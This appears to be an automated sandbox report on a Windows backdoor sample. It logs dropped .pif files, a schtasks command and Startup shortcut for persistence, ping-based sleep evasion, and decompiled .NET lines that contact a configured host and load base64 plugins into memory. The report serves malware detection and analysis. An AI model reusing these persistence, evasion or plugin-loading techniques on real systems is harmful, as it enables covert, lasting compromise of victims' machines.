Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static file information: File size 10515536 > 1048576

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegAsm.pdbRegAsm.pdbpdbAsm.pdbicrosoft\Windows\INetCache\23855\RegAsm.pdb4 source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89 source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.PDBR$ source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbh source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp, RegAsm.exe.11.dr
Source:	Binary string: \??\C:\Windows\exe\RegAsm.pdbmV[ source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: nC:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89\System.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdblT source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdbv* source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbwF= source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdbw source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegAsm.pdbV= source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe.11.dr
Source:	Binary string: symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\RegAsm.pdbnVR source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbs source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n,C:\Windows\RegAsm.pdbpdbAsm.pdbI source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack, Messages.cs	.Net Code: Memory
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.2.Telecom.pif.4552c30.4.raw.unpack, Messages.cs	.Net Code: Memory
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, Messages.cs	.Net Code: Memory
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.4552c30.2.raw.unpack, Messages.cs	.Net Code: Memory
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.3.Telecom.pif.454d480.1.raw.unpack, Messages.cs	.Net Code: Memory

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

11_2_00445FC8

Source: Northeast.0.dr

Static PE information: real checksum: 0xf6bf3 should be: 0x42226

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004902D8 push cs; retn 0048h	11_2_00490318
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00460DE6 push ecx; ret	11_2_00460DF9
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045DC7C push AA0049CFh; iretd	11_2_0045DC87

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif			Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	File created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif			Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	File created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoScape.url

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004D26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		11_2_004D26DD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0045FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		11_2_0045FC7C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Memory allocated: 2B70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Memory allocated: 2D10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Memory allocated: 4D10000 memory reserve \| memory write watch

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Window / User API: threadDelayed 5579

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast

Jump to dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

API coverage: 4.9 %

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif TID: 1528	Thread sleep count: 5579 > 30			Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif TID: 1528	Thread sleep time: -55790s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Thread sleep count: Count: 5579 delay: -10

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_00406850 FindFirstFileW,FindClose,	0_2_00406850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C26
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	11_2_004AE472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004AD921
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004ADC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004BA087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004BA1E2
